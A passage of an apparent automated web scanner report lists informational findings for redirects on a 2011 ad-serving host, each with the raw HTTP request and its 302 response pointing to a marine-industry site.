<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:18:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.166. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:14:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.170. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247278436/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1272193750/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1274390102/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1275242828/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1277905469/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1280397791/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
